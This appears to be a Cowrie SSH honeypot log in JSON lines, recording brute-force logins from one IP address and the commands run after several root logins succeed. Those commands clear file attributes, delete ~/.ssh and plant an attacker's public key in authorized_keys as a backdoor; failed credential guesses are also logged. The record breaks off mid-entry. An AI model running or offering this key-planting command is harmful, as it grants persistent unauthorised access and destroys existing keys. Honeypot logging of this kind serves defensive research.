{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:42.678018Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456@","message":"login attempt [root/Ff123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:59:43.700943Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:59:44.210613Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:59:44.211442Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:59:44.212546Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:44.459593Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:59:45.064758Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:59:45.065430Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:59:45.312891Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:45.313739Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40760,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaebc90217d3","protocol":"ssh","message":"New connection: 212.227.235.229:40760 (1.2.3.4:22) [session: aaebc90217d3]","sensor":"my-vps","timestamp":"2025-09-08T22:59:45.563079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:45.563825Z","src_ip":"212.227.235.229","session":"aaebc90217d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:45.813975Z","src_ip":"212.227.235.229","session":"aaebc90217d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:46.854978Z","src_ip":"212.227.235.229","session":"aaebc90217d3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:48.107193Z","src_ip":"212.227.235.229","session":"aaebc90217d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40070,"dst_ip":"1.2.3.4","dst_port":22,"session":"509c93bf5f43","protocol":"ssh","message":"New connection: 212.227.235.229:40070 (1.2.3.4:22) [session: 509c93bf5f43]","sensor":"my-vps","timestamp":"2025-09-08T22:59:48.353303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:48.353938Z","src_ip":"212.227.235.229","session":"509c93bf5f43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:48.603941Z","src_ip":"212.227.235.229","session":"509c93bf5f43"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:59:50.219462Z","src_ip":"212.227.235.229","session":"509c93bf5f43"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:50.472727Z","src_ip":"212.227.235.229","session":"509c93bf5f43"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:50.474875Z","src_ip":"212.227.235.229","session":"559bac5aff41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45814,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcda84628c37","protocol":"ssh","message":"New connection: 212.227.235.229:45814 (1.2.3.4:22) [session: fcda84628c37]","sensor":"my-vps","timestamp":"2025-09-08T23:00:04.020124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:04.036734Z","src_ip":"212.227.235.229","session":"fcda84628c37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:04.284270Z","src_ip":"212.227.235.229","session":"fcda84628c37"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2@2025","message":"login attempt [test2/test2@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:05.277664Z","src_ip":"212.227.235.229","session":"fcda84628c37"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:06.529508Z","src_ip":"212.227.235.229","session":"fcda84628c37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47602,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d8ff8504ae5","protocol":"ssh","message":"New connection: 212.227.235.229:47602 (1.2.3.4:22) [session: 2d8ff8504ae5]","sensor":"my-vps","timestamp":"2025-09-08T23:00:11.027036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:11.027647Z","src_ip":"212.227.235.229","session":"2d8ff8504ae5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:11.127600Z","src_ip":"212.227.235.229","session":"2d8ff8504ae5"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"!","message":"login attempt [nginx/!] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:11.569016Z","src_ip":"212.227.235.229","session":"2d8ff8504ae5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:12.671504Z","src_ip":"212.227.235.229","session":"2d8ff8504ae5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51332,"dst_ip":"1.2.3.4","dst_port":22,"session":"42d259580f38","protocol":"ssh","message":"New connection: 212.227.235.229:51332 (1.2.3.4:22) [session: 42d259580f38]","sensor":"my-vps","timestamp":"2025-09-08T23:00:13.537406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:13.538389Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:13.769780Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.login.success","username":"root","password":"p4ssw0rd","message":"login attempt [root/p4ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:00:14.735604Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:00:15.255144Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:00:15.255859Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:00:15.256751Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:15.489250Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:00:15.978639Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:00:15.979624Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:00:16.214641Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:00:16.215615Z","src_ip":"212.227.235.229","session":"42d259580f38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51342,"dst_ip":"1.2.3.4","dst_port":22,"session":"15e5869c2ad1","protocol":"ssh","message":"New connection: 212.227.235.229:51342 (1.2.3.4:22) [session: 15e5869c2ad1]","sensor":"my-vps","timestamp":"2025-09-08T23:00:16.440867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:16.441996Z","src_ip":"212.227.235.229","session":"15e5869c2ad1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:00:16.670416Z","src_ip":"212.227.235.229","session":"15e5869c2ad1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:00:17.625428Z","src_ip":"212.227.235.229","session":"15e5869c2ad1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49510,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d163e7ff4ca","protocol":"ssh","message":"New connection: 212.227.235.229:49510 (1.2.3.4:22) [session: 5d163e7ff4ca]","sensor":"my-vps","timestamp":"2025-09-08T23:00:18.396043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:00:18.397039Z","src_ip":"212.227.235.229","session":"5d163e7ff4ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-